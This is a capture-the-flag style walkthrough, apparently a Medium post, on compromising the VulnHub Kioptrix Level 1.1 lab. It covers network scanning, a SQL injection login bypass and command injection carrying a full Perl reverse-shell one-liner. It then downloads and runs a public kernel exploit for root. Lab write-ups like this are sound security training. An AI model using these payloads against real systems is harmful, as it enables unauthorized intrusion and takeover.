Kioptrix: Level 1.1 (#2) Walkthrough

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Enumeration:

So letz find out the IP of the Kioptrix. For that we use the command;

netdiscover 
The highlighted IP is our Kioptrix machine IP
nmap -sC -sV 192.168.0.105

Port 80:

We visit the webpage hosted on port 80

http://192.168.0.105:80
We see some kind of login page
ctrl+u
Nothing interesting
gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let run in the background
Username & password same
SELECT * FROM USERS WHERE username=’’ AND password=’’

EXPLOITATION:

Now letz try Command Injection.Using the Wappalyzer extension we know that the page is PHP based so;

;bash — version
;perl -v
nc -nlvp 443
in our terminal
In Webpage
perl -e 'use Socket;$i="192.168.0.104";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
We are not root user

POST EXPLOITATION:

So now letz escalate our privileges:

cat /proc/version
https://www.exploit-db.com/exploits/9542
gedit exploit.c
clang -o exploit -m32 exploit.c
mv exploit /var/www/html
service apache2 start
wget 192.168.0.104/exploit
ls
chmod 755 exploit
./exploit

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store